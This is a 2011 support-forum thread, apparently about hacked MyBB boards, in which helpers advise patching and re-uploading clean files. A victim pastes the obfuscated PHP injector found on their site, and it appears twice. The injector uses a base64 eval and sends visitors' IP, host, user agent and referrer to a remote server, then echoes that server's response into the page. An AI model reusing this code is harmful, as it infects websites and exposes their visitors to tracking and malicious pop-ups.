(2011-10-13, 03:34 AM)pavemen Wrote: [ -> ]you have a problem much like the other users with malicious code injected into your site. You need to clean your templates. Can you post your showthread_newreply_closed template here?
Here is my template for requested. Looks clean to me.
<a href="newreply.php?tid={$tid}"><img src="{$theme['imglangdir']}/closed.png" alt="{$lang->thread_closed}" title="{$lang->thread_closed}" /></a>
have you made the edits posted in the blog about this vulnerability? have you run file verification to see what has been edited?
(2011-10-13, 04:54 PM)pavemen Wrote: [ -> ]have you made the edits posted in the blog about this vulnerability? have you run file verification to see what has been edited?
I did run verification my host, dreamhost told me to use the instant backup. I backuped it up to like 1 week. I couldn't do the 1 hour to 1 day.
as I asked before, have you made the edits posted in the blog about this vulnerability?
that is not virus on something not serious protect your safe domain security more highly!
(2011-10-13, 08:40 PM)pavemen Wrote: [ -> ]as I asked before, have you made the edits posted in the blog about this vulnerability?
I found this on one of my pages and its at the end of my php tags. Its still happening in my forum. Can you help me please?
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[/code]
(2011-10-13, 09:44 PM)hon0r Wrote: [ -> ]yes i have .
getting this error over and over.
http://i.imgur.com/nO4H3.png
if you have not edited those files, then you need to download the latest MyBB package (don't use an old one you already have, get a new one) and then upload the files again. You should not have to change anything and this assumes you are already running 1.6.4
(2011-10-14, 12:07 AM)JukEboX Wrote: [ -> ] (2011-10-13, 08:40 PM)pavemen Wrote: [ -> ]as I asked before, have you made the edits posted in the blog about this vulnerability?
I found this on one of my pages and its at the end of my php tags. Its still happening in my forum. Can you help me please?
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
[/code]
just do like i posted above, get a new download of MyBB and then upload the new files.
(2011-10-14, 12:07 AM)JukEboX Wrote: [ -> ]as I asked before, have you made the edits posted in the blog about this vulnerability?
My members are having the same issue, pop-ups leading to spammy sites that are giving them viruses. We found out it's coming from somewhere in Vietnam and I banned the IP address, but it's still popping up. I tried to do what the blog post said, but I'm not sure where I can find that piece of code? My host actually coded and set the board up for me, because technical is not my strong point, but I really want to fix this, just need someone to point me in the right direction.
Thanks!